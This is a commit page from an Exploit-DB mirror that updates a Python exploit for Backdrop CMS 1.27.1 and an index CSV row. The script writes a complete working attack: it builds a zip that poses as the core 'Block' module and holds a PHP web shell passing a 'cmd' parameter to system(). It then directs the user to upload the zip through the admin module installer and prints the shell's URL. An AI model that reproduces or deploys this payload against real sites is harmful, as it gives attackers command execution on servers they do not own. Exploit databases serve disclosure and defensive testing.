bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-06-08

Browse source 
2 changes to exploits/shellcodes/ghdb

Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
This commit is contained in:
Exploit-DB 2024-06-08 00:16:25 +00:00
parent 8a32e340d5
commit a99f08beda
2 changed files with 67 additions and 72 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

137
exploits/php/webapps/52021.py
View file

@ -1,4 +1,4 @@
# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) # Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Date: 04/27/2024 # Date: 04/27/2024
# Exploit Author: Ahmet Ümit BAYRAM # Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://backdropcms.org/ # Vendor Homepage: https://backdropcms.org/
@ -10,88 +10,83 @@ import os
import time import time
import zipfile import zipfile
def create_files(): def create_files():
info_content = """ info_content = """
type = module type = module
name = Block name = Block
description = Controls the visual building blocks a page is constructed description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a with. Blocks are boxes of content rendered into an area, or region, of a
web page. web page.
package = Layouts package = Layouts
tags[] = Blocks tags[] = Blocks
tags[] = Site Architecture tags[] = Site Architecture
version = BACKDROP_VERSION version = BACKDROP_VERSION
backdrop = 1.x backdrop = 1.x
configure = admin/structure/block configure = admin/structure/block
; Added by Backdrop CMS packaging script on 2024-03-07 ; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop project = backdrop
version = 1.27.1 version = 1.27.1
timestamp = 1709862662 timestamp = 1709862662
""" """
shell_info_path = "shell/shell.info" shell_info_path = "shell/shell.info"
os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur
oluşturur with open(shell_info_path, "w") as file:
with open(shell_info_path, "w") as file: file.write(info_content)
file.write(info_content)
shell_content = """ shell_content = """
<html> <html>
<body> <body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute"> <input type="SUBMIT" value="Execute">
</form> </form>
<pre> <pre>
<?php <?php
if(isset($_GET['cmd'])) if(isset($_GET['cmd']))
{ {
system($_GET['cmd']); system($_GET['cmd']);
} }
?> ?>
</pre> </pre>
</body> </body>
</html> </html>
""" """
shell_php_path = "shell/shell.php" shell_php_path = "shell/shell.php"
with open(shell_php_path, "w") as file: with open(shell_php_path, "w") as file:
file.write(shell_content) file.write(shell_content)
return shell_info_path, shell_php_path
return shell_info_path, shell_php_path
def create_zip(info_path, php_path): def create_zip(info_path, php_path):
zip_filename = "shell.zip" zip_filename = "shell.zip"
with zipfile.ZipFile(zip_filename, 'w') as zipf: with zipfile.ZipFile(zip_filename, 'w') as zipf:
# Dosyaları shell klasörü altında sakla zipf.write(info_path, arcname='shell/shell.info')
zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php')
zipf.write(php_path, arcname='shell/shell.php') return zip_filename
return zip_filename
def main(url): def main(url):
print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
time.sleep(3) time.sleep(3)
print("Evil module generating...") print("Evil module generating...")
time.sleep(2) time.sleep(2)
info_path, php_path = create_files() info_path, php_path = create_files()
zip_filename = create_zip(info_path, php_path) zip_filename = create_zip(info_path, php_path)
print("Evil module generated!", zip_filename) print("Evil module generated!", zip_filename)
time.sleep(2) time.sleep(2)
print("Go to " + url + "/admin/modules/install and upload the " + print("Go to " + url + "/admin/modules/install and upload the " +
zip_filename + " for Manual Installation.") zip_filename + " for Manual Installation.")
time.sleep(2) time.sleep(2)
print("Your shell address:", url + "/modules/shell/shell.php") print("Your shell address:", url + "/modules/shell/shell.php")
if __name__ == "__main__": if __name__ == "__main__":
import sys import sys
if len(sys.argv) < 2: if len(sys.argv) < 2:
print("Usage: python script.py [url]") print("Usage: python script.py [url]")
else: else:
main(sys.argv[1]) main(sys.argv[1])

2
files_exploits.csv
View file

@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip, 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,, 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,, 52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info

Can't render this file because it is too large.